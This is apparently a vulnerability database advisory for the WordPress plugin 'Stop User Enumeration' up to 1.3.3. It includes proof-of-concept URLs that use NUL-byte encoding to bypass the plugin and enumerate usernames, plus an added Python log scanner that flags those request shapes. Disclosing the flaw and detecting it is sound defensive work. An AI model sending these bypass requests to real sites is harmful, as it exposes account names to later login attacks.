Stop User Enumeration <= 1.3.3 - Username Enumeration Bypass



Description
With the plugin "Stop User Enumeration" 1.3.3 installed, it is possible to bypass its protection and obtain the usernames.
Proof of Concept
Blocked: http://www.example.com/?author%00=%001
Passed: http://www.example.com/?bypass=1&author%00=1
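
A log check for the pattern the PoC shows, as an added example that is not part of the original advisory or the plugin's code: it percent-decodes every query parameter, drops NUL bytes, and flags a numeric `author` lookup at any position in the query string. The NUL-stripping rule, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def clean(text):
    # Assumption: NUL bytes are dropped before comparison, so every
    # variant in the advisory's PoC collapses to the plain name/value.
    return text.replace("\x00", "").strip()

def author_probes(target):
    """Return (raw_name, raw_value) for each parameter that is a numeric
    author lookup after normalisation, wherever it sits in the query."""
    hits = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if clean(name) == "author" and clean(value).isdigit():
            hits.append((name, value))
    return hits

def scan(log_lines):
    """Return (line_no, target, obfuscated) for each flagged request.
    obfuscated is True when the raw name or value was not the plain form."""
    findings = []
    for no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        hits = author_probes(match.group(1))
        if hits:
            obfuscated = any(n != "author" or not v.isdigit() for n, v in hits)
            findings.append((no, match.group(1), obfuscated))
    return findings

# Constructed sample log lines (addresses, times and status codes are made up);
# lines 2 and 3 carry the two request shapes from the Proof of Concept.
SAMPLE = [
    '203.0.113.7 - - [01/Apr/2016:10:00:00 +0000] "GET /?author=1 HTTP/1.1" 301 0',
    '203.0.113.7 - - [01/Apr/2016:10:00:01 +0000] "GET /?author%00=%001 HTTP/1.1" 403 0',
    '203.0.113.7 - - [01/Apr/2016:10:00:02 +0000] "GET /?bypass=1&author%00=1 HTTP/1.1" 301 0',
    '198.51.100.4 - - [01/Apr/2016:10:00:03 +0000] "GET /?s=author+interview HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for no, target, obfuscated in scan(SAMPLE):
        print(no, target, "obfuscated" if obfuscated else "plain")
```
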

Affects Plugin

Fixed in version 1.3.4

References

URL https://wordpress.org/plugins/stop-user-enumeration/changelog/
URL https://plugins.trac.wordpress.org/changeset/1390935/stop-user-enumeration

Classification

Type BYPASS

Miscellaneous

Submitter Carlos Montiers Aguilera
Views 4414
Verified No
WPVDB ID 8436

Timeline

Publicly Published 2016-04-01 (over 3 years ago)
Added 2016-04-11 (over 3 years ago)
Last Updated 2019-10-31 (about 1 month ago)
